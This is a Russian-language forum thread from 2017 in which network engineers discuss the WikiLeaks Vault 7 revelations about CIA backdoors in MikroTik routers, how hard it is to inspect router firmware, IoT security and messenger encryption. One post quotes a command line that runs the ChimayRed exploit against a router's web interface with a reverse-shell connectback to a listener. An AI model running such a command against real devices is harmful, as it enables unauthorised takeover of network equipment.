Mikrotik и ЦРУ

[nuclearcat]

В новой утечке wikileaks ( https://betanews.com/2017/03/07/wikileaks-vault-7-cia-year-zero/ ) немалое внимание уделяется подсадке бекдоров в Mikrotik.

Сижу, читаю, и тем больше понимаю, что закрытость микротика выльется в то, что хозяйничать в нем будет кто угодно, но не его админ.

Т.е. по факту выявить такой бекдор практически невозможно.

[s.lobanov]

Ну всё, за саабом уже выехали

 

[EShirokiy]

Зачем пароли на файлы?

[Sergey Gilfanov]

А, собственно, какая разница с любым другим сетевым оборудованием с закрытыми прошивками?

[jffulcrum]

Никакой

[nuclearcat]

Разница есть. У циски есть более-менее прозрачный метод для анализа запущенных процессов, находящихся на внутреннем носителе файлов, условно прозрачный механизм проверки криптоподписи прошивки лежащей на флешке и т.п.

И если мы говорим про олдскульные циски из содержимого флешки, это всего лишь блоб с IOS, на который есть контрольная сумма и bootloader. bootloader можно перешить тоже и проверить контрольную сумму перед прошивкой.

В джунах можно загрузится вообще с USB флешки, да и шелл там весьма доступен, вместе со многими вкусными утилитами freebsd. Я так думаю в IOSXE тоже немало утилит из линукса доступно. Т.е. при необходимости forensics analysis я провести могу.

У микротика это усиленно замазанный и забекдоренный линукс, и возможностей по проверке этого фаршмака, у админа, как не парадоксально - намного меньше. На нем даже сраного netstat нет!

Учитывая что тулзы для его взлома "уехали за края", на любом месте где есть самые минимальные требования на безопасность - на микротик будет налагаться запрет.

[nuclearcat]

https://wikileaks.org/ciav7p1/cms/page_16384604.html

Наслаждайтесь. Питоновский скриптик, и ваш микротик "заряжен".

[MEF]

https://wikileaks.org/ciav7p1/cms/page_16384604.html

Наслаждайтесь. Питоновский скриптик, и ваш микротик "заряжен".

а если порты закрыты?

Я бы на вашем месте не цру боялся :)

Edited March 7, 2017 by MEF

[Andrei]

Еще новости от WikiLeaks http://www.kommersant.ru/doc/3236563

Документы показывают, что ЦРУ и сотрудничающие с ним разведывательные организации нашли способ обходить шифрованиие данных, применяющееся в телефонах и мессенджерах, таких, как WhatsApp, Telegram и Signal. По словам представителей WikiLeaks, правительственные структуры имеют теперь возможность проникать в телефоны с ОС Android и «собирать аудиотраффик и сообщения до того, как они будут зашифрованы».

[karpa13a]

Andrei ломая сам аппарат

[zhenya`]

Никакой

ну это не циско равтеры\свичи.

[Sergey Gilfanov]

Ломаные сетевое оборудование - плохо, но уже давно в головы убить пытаются, что линии связи по своей природе ненадёжны и это надо учитывать. В тех же документах, как я понимаю - куда веселее часть про взлом конечных устройств. Сдаётся мне, что весь шум про IoT сейчас накроется медным тазом и сдуется.

Т.к. придётся теперь думать, что эти things должны как-то защищены быть и поддерживаться производителем на предмет патчей хотя бы лет так 10.

[zi_rus]

поддерживаться производителем на предмет патчей хотя бы лет так 10

оно разваливается за три года, зачем там что-то поддерживать

[Sergey Gilfanov]

оно разваливается за три года, зачем там что-то поддерживать

Странно, телевизору уже лет 12. Не разваливается. Или те, которые сеть умеют - именно такие разваливающиеся?

[zhenya`]

Современное все разваривается и имеет гарантийный срок службы ровно на время жизни

[woddy]

Или те, которые сеть умеют - именно такие разваливающиеся?

именно так. то скайп отвалится то еще что нибудь.

 

Самое смешное - умные розетки и подобный хлам завязанный на облако производителя. Производитель через три года исчезает и умный дом превращается в тыкву

[jffulcrum]

forensics analysis я провести могу

 

Сиречь патологоанатомическое исследование трупа. В обнаружении активного бекдора помощи от анализа сумм на флешке мало. Они, суммы, могут и вообще не измениться - достаточно кода в памяти, за устройством присматривает контроллер, ребутнут - сломает снова, тем же эксплойтом.

 

ну это не циско равтеры\свичи

Ну вот вам ASA, http://www.securityfocus.com/bid/96161/info . Там на сайте 95 страниц только по Cisco, если что.

 

Сломать могут даже полностью опенсорсный (железо и софт) роутер. Поэтому, ежели допотребна защита, то это анализ трафика - IDS, c L2 зондами в разрыве, желательно. И пентесты по расписанию и без расписания. Главная уязвимость, кстати, сам админ устройства. Собственно:

 

Питоновский скриптик, и ваш микротик "заряжен".

 

- это тоже админ. Ой, что это, помогите, дамы напуганы!

 

Exploit RB 493G using ChimayRed.
python chimay_red.py -t 172.20.100.6:80 connectback -l 172.20.12.23 -p 4242

 

А нет, все в порядке. Админ вебсервер управления устройства выставил на растерзание. Ой, а если бы там был свободный lighthttpd, то... Да то же самое, http://www.securityfocus.com/bid/59495 (см страницу Solution - ну это же opensource, все уже все исправили сами, да?).

[stas_k]

Есть серьёзные основания полагать, что государство все же получило неограниченный доступ к трафику мессенджера Telegram и архиву за три года.

 

Закон Яровой действует."

 

Всем срочно сваливать с телеги надо :)

дурашка.

вам поздно уже валить.

[Sergey Gilfanov]

Он действительно не понимает, что в таком ключе оно никому не нужно и ни от чего не защищает? :)

Вообще-то защищает. От массовой прослушки кем попало(отличаем от конечного числа известных организаций) с дальнейшим складированием. Т.е. защищается не конкретный абонент (если надо - действительно сломают), а все сразу.

Это как правила движения. Никто же не говорит "нафига надо, если захотят, все равно собьют". Но в целом безопасность они повышают.

[Ivan_83]

Сдаётся мне, что весь шум про IoT сейчас накроется медным тазом и сдуется. Т.к. придётся теперь думать, что эти things должны как-то защищены быть и поддерживаться производителем на предмет патчей хотя бы лет так 10.

ИоТ - это игрушки для взрослых. Ума у этих взрослых не больше чем у детей. Поэтому ИоТ ничего не грозит, дебилов с деньгами полно.

Видел лампочку филипс *** за 15к руб. Может мне с магазином повезло, хз.

За цену десятка таких лампочек дома можно всю электропроводку переделать и поставить ргб лент со всякими ДУ, впрочем ргб ленты ду и так продаются и дешевле намного, но их же надо монтажить.... а большие дети они рукожопы и нанять они никого не могут ибо имбицилы.

 

Вообще-то защищает. От массовой прослушки кем попало(отличаем от конечного числа известных организаций) с дальнейшим складированием. Т.е. защищается не конкретный абонент (если надо - действительно сломают), а все сразу.

Это мазохистическая позиция.

 

Он действительно не понимает, что в таком ключе оно никому не нужно и ни от чего не защищает? :)

Формально приложение тут не причём. Тут Паша прав.

 

Стандартное шифрование делает все тоже самое.

Это какое стандартное?

Шифр цезаря? Атбаш? Хор?

[Sergey Gilfanov]

Проблема же не в шифровании (в месседжерах то же самое tls по большому счету, когда именно шифровать сообщения начинают), а в обмене и генерации ключей с которых tls начинает работать. Оно как сделано? - В этом и отличие.

[ilili]

По-поводу микротика и вообще любых других устройств: кто оставляет менеджмент открытым для внешки, даже запароленный, тот сам и дурак. Тут не в микротике дело.

p.s. скрипт бы этот посмотреть )

[satboy]

Даже закрытый менеджмент не поможет, когда парням из АНБ нужен будет доступ.... наверняка они прописали себе доступ, например с 8.8.8.8

[ilili]

Даже закрытый менеджмент не поможет, когда парням из АНБ нужен будет доступ.... наверняка они прописали себе доступ, например с 8.8.8.8

Это да. Поэтому, надо расслабиться и попытаться получить удовольствие ))

[nuclearcat]

Скажем так - закрытый менеджмент сильно осложнит задачу, им прийдется использовать намного более сложные утилиты, и намного более ценные. Велика вероятность, что их используют только в очень особых случаях, т.к. если вылезет сам факт закладки черного хода скажем в rng, и его изучат при попытке использования - жопы будут дымиться на порядок сильнее, чем от нынешней утечки.